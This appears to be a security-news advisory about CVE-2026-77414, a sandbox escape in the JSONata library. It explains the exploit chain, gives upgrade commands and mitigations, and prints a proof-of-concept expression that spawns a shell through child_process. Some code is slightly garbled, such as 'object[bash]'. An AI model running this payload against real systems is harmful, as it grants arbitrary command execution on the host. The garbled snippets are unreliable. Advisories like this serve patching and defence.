Listen to this Post
CVE-2026-77414 is a critical vulnerability affecting the JSONata JSON query and transformation language library. The flaw resides in the `environment.lookup` function within src/jsonata.js, where a `hasOwnProperty` check could be bypassed by crafted expressions. Prior to versions 1.8.8 and 2.2.1, an attacker could supply a malicious JSONata expression that chains multiple object‑integrity weaknesses to break out of the intended sandbox and execute arbitrary code on the host system.
The exploitation chain begins by overwriting the internal `$clone` variable, which allows mutation of objects through the `evaluateTransformExpression` method. From there, the attacker exposes and deconstructs JSONata functions or lambdas via `$merge.` operations. The `applyProcedure` function is then targeted—specifically its use of proc.arguments.forEach—to forge internal lambda state. These primitives collectively enable access to prototype getters and the `$constructor` property.
With `$constructor` in hand, the attacker can invoke `process.getBuiltinModule` and pass `child_process` as an argument. This grants the ability to execute arbitrary system commands with the full privileges of the host process. The bypass is achieved because the `hasOwnProperty` check in `environment.lookup` did not properly validate all paths, allowing crafted expressions to use $hasOwnProperty, $spread, and `$string` to reach the object prototype.
The vulnerability is classified as CWE-94: Improper Control of Generation of Code (Code Injection). The CVSS v4.0 score is 9.3 (Critical), with attack vector over the network, low attack complexity, no privileges required, and no user interaction needed. A successful exploit leads to complete system compromise, including data exfiltration, file modification, and lateral movement within the network. The fix was merged via pull request 799 and is included in releases 1.8.8 and 2.2.1.
DailyCVE Form:
Platform: Node.js / npm
Version: <1.8.8, <2.2.1
Vulnerability: Arbitrary Code Execution
Severity: Critical (CVSS 9.3)
date: 2026-08-21
Prediction: Patch already released
What Undercode Say:
Check installed JSONata version npm list jsonata Identify vulnerable versions (prior to 1.8.8 and 2.2.1) npm view jsonata versions --json | grep -E '"1.([0-7].|8.[0-7])"|"2.([0-1].|2.[0-0])"' Upgrade to patched version npm install [email protected] or for legacy branch npm install [email protected]
// Code snippet showing the vulnerable lookup function (simplified)
// src/jsonata.js lines 1863–1871 (before patch)
if (object && object.hasOwnProperty && object.hasOwnProperty(name)) {
return object[bash];
}
// The check was bypassable via prototype pollution
Exploit: (Educational Purposes!)
// Proof-of-Concept (PoC) as provided in the advisory
import jsonata from "jsonata";
const expression = jsonata(<code>(
$hasOwnProperty := $spread($string);
$__proto__ := $constructor;
$constructor("return process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'})")();
)</code>);
await expression.evaluate({});
Executing this crafted expression spawns a shell with the privileges of the host process.
Protection:
- Upgrade to JSONata 1.8.8 or 2.2.1 immediately.
- If unable to upgrade, avoid evaluating untrusted JSONata expressions.
- Run JSONata evaluations inside a restricted sandbox (e.g., isolated VM or container).
- Consider disabling or wrapping the `environment.lookup` function until the patch can be applied.
- Monitor for any suspicious JSONata expressions that attempt to access
$constructor,$spread, orprocess.getBuiltinModule.
Impact:
- Full system compromise – arbitrary code execution with host process privileges.
- Data exfiltration – sensitive files and environment variables can be read.
- Lateral movement – compromised server can be used to pivot within the network.
- Service disruption – attackers can modify or delete critical files.
- Supply chain risk – applications that process user‑supplied JSON data via JSONata are directly exposed.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

